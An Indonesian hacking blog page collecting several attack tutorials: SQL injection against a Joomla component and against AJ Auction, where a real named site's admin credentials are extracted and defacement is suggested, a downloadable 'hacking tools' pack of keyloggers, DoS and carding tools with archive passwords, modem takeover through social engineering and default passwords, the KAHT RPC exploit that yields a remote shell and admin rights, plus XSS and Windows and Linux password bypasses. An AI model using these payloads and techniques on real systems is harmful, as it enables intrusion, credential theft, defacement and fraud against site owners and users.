Indonesian Freebie Web and Graphic Designer Resources

Kamis, 09 Desember 2010

Implementasi SQL Injection pada Joomla

Implementasi SQL Injection pada Joomla

Posted by Admin on June 11, 2009 in Tutorial Hacking · 7 Comments

Implementasi SQL Injection pada Joomla web desain grafisApa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.

Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.

Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~

Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.

Ya, Langsung aja ...

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

Implementasi SQL Injection pada Joomla web desain grafis
Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ' ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1'

Implementasi SQL Injection pada Joomla web desain grafis
Apa yang terjadi ? ... error...

Langkah selanjutnya adalah cari urutan si table 'dssyndicate_feeds' dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* --> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* --> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* --> errornya berbeda

perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users

lihat paling akhir dari baris tersebut,
from+wc_users

wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,
Implementasi SQL Injection pada Joomla web desain grafis

Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.

Implementasi SQL Injection pada Joomla web desain grafis
Lihat angka 2 di dalam tag : <br /> <br /><title>2 (18)

Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini ...

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users

Implementasi SQL Injection pada Joomla web desain grafis
perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :

5.0.33 (18)

Mysql versi 5.0.33 :D, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D.

Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut ...

admin (18)

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users

perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :

Implementasi SQL Injection pada Joomla web desain grafis
admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.

Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.

Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya ... :D.

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://www.unair.info/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya
Peterpanz yang kerepotan ngurus skripsi juga :D, mr.freeman, for jojo too, najwa[at]STSN, dr.emi, denice the manace, Phii_, fadli


CD Hacking Tools 2010 – Gratis download

CD Hacking Tools ( Mirror was Updated )

XxxPass-Team 2007
Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di : Updated Links !!! Hacking tools 2007

http://rapidshare.com/files/85433778/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part1.rar
http://rapidshare.com/files/85426770/XxxPass-C_H_Ver1.0-_2007-part1_up_by_juur.xup.pl.part2.rar

Pass : XxxPass_DJ_haselking
Pass :-XxxPass_DJ_haselking

Hack ... hack ... hack the World !! :D
( Just for lamerz )


Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :



Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )



Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.



Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :



Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U



Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,



Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: | Proxy: | Koneksi:



Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.







Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite



Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

// Greetz :



Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.

Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor.

Fel_c, Mentari^, Abang Dennis the Manace

Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue


Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...

-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

C:Documents and SettingsAl-k>net user

User accounts for \NOMATTER ------------------------------------------------------------------------------- Administrator Al-k GNU-- keluarga -- Guest HelpAssistant SUPPORT_388945a0 VUSR_NOMATTER The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

D:Data+ku_>kaht 127.0.0.0 127.0.0.3_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! FULL VERSION? :) - AUTOHACKING ________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress... - Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User.



C:WINDOWSsystem32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter.
Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (


ilmuwebsite.com

// Refferensi :
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink

// Greetz :
- y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
- Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
- Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! :)“
- hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
- Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase


Sedikit penjelasan mengenai XSS vulnerability

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=



http://www.malesbanget.com/kamus/definisi.php?kata=

kemudian tekan enter ...
kemudian akan muncul popup baru berisi 'Tes, XSS-nya masih bisa'

Terus ... ???
Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google. :)

contoh lainnya adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

Hacked by Me



Cuma gitu doang ???
Iya... segitu dulu aja entar di lanjut lagi. Tunggu aja. :)

ilmuwebsite.com


SQL Injection AJ Auction seluruh versi

SQL Injection pada Aj Auction untuk seluruh versi.

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett ...
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel ...

hehehehe ... deface deface ...


Jadi root di linux tanpa password

Jadi root di linux tanpa harus menggunakan password

Boot Linux tanpa Password
Melalui mode single pada GRUB

Hi, ketemu lagi dengan saya, sikeren Al-k. ;)
Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password,
tapi kali ini saya akan menjelaskannya pada Linux.
Mungkin pada artikel yang lain telah di jelaskan bagaimana
cara melakukan login tanpa password dengan bootloader Lilo,
tapi kali ini saya akan menjelaskannya pada bootloader Grub.


Beginilah caranya ...

1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS.
Pilih, yang Redhat Linux, terus tekan e di keyboard.
Tombol e berguna untuk melakukan edit.

2.) http://h1.ripway.com/alk/grub.png
setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel blablablablaba ...
tekan e dikeyboard

3.) Kemudian tambahkan s atau single dibelakangnya, kira kira seperti ini

kernel /boot/vmlinuz-2.6.15-1-686 root=/dev/sda1 ro single

setelah itu Escape.

4.) Masih dalam keadaan memilih kernel, kemudian tekan b di keyboard untuk Boot. anda akan di bawa
pada kedudukan root. Silahkan ketik passwd untuk mengganti password yang baru atau anda bisa
mengedit file /etc/shadow, untuk menghilangkan password pada root.

Jreng jreng jreng ... satu lagi, anda login sebagai administrator tanpa password

// Greetz :

- Fel_c, Mentari^, BLACK.SCORPIO, Zahra_Fakhrunisa, Lady_Sizuka, Upie, Ipank
- Allguys in #khilafah, http://www.jcunited.tk


Twitter Delicious Facebook Digg Favorites More